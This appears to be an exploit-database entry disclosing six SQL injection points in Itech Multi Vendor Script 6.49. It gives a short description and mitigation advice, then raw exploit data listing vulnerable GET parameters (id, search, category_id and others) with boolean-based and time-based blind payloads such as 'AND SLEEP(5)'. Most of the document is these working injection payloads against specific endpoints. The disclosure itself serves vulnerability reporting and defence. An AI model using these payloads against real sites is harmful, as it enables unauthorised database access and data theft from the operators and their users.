Itech Multi Vendor Script - Multiple SQL Injections

vendor:

Itech Multi Vendor Script

by:

Yunus YILDIRIM (Th3GundY)

7,5

CVSS

HIGH

SQL Injection

89, 89, 89, 89, 89

CWE

Product Name: Itech Multi Vendor Script

Affected Version From: 6.49

Affected Version To: 6.49

Patch Exists: YES

Related CWE: N/A

CPE: a:itechscripts:itech_multi_vendor_script

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Itech Multi Vendor Script – Multiple SQL Injections

Multiple SQL Injections have been identified in Itech Multi Vendor Script version 6.49. These injections can be exploited by sending malicious payloads to the vulnerable parameters in the application. The payloads can be used to extract sensitive information from the database or to execute malicious code on the server.

Mitigation:

Input validation should be used to prevent malicious payloads from being sent to the application. Additionally, the application should be kept up to date with the latest security patches.

Source

Exploit-DB raw data:

# Exploit Title :  Itech Multi Vendor Script - Multiple SQL Injections
# Author 		:  Yunus YILDIRIM (Th3GundY)
# Team 			:  CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
# Website 		:  http://www.yunus.ninja
# Contact 		:  yunusyildirim@protonmail.com

# Vendor Homepage : http://itechscripts.com/
# Software Link   : http://itechscripts.com/multi-vendor-shopping-script/
# Vuln. Version	  : 6.49
# Demo			  : http://multi-vendor.itechscripts.com


# # # #  DETAILS  # # # # 

SQL Injections :

# 1
http://localhost/quickview.php?id=10
	Parameter: id (GET)
	    Type: boolean-based blind
	    Title: AND boolean-based blind - WHERE or HAVING clause
	    Payload: id=10 AND 9776=9776

	    Type: AND/OR time-based blind
	    Title: MySQL >= 5.0.12 AND time-based blind
	    Payload: id=10 AND SLEEP(5)

# 2
http://localhost/product.php?id=9
	Parameter: id (GET)
	    Type: boolean-based blind
	    Title: AND boolean-based blind - WHERE or HAVING clause
	    Payload: id=9 AND 9693=9693

	    Type: AND/OR time-based blind
	    Title: MySQL >= 5.0.12 AND time-based blind
	    Payload: id=9 AND SLEEP(5)

# 3
http://localhost/product_search.php?search=Adidas
	Parameter: search (GET)
	    Type: AND/OR time-based blind
	    Title: MySQL >= 5.0.12 AND time-based blind
	    Payload: search=Adidas%' AND SLEEP(5) AND '%'='

# 4
http://localhost/product_search.php?category_id=1
	Parameter: category_id (GET)
	    Type: boolean-based blind
	    Title: AND boolean-based blind - WHERE or HAVING clause
	    Payload: category_id=1 AND 8225=8225

	    Type: AND/OR time-based blind
	    Title: MySQL >= 5.0.12 AND time-based blind
	    Payload: category_id=1 AND SLEEP(5)

# 5
http://localhost/product_search.php?category_id=1&sub_category_id=1&sub_sub_category_id=1
	Parameter: sub_sub_category_id (GET)
	    Type: boolean-based blind
	    Title: AND boolean-based blind - WHERE or HAVING clause
	    Payload: category_id=1&sub_category_id=1&sub_sub_category_id=1 AND 7485=7485

	    Type: AND/OR time-based blind
	    Title: MySQL >= 5.0.12 AND time-based blind
	    Payload: category_id=1&sub_category_id=1&sub_sub_category_id=1 AND SLEEP(5)

# 6
http://localhost/product_search.php?category_id=1&sub_category_id=1
	Parameter: sub_category_id (GET)
	    Type: boolean-based blind
	    Title: AND boolean-based blind - WHERE or HAVING clause
	    Payload: category_id=1&sub_category_id=1 AND 5242=5242

	    Type: AND/OR time-based blind
	    Title: MySQL >= 5.0.12 AND time-based blind
	    Payload: category_id=1&sub_category_id=1 AND SLEEP(5)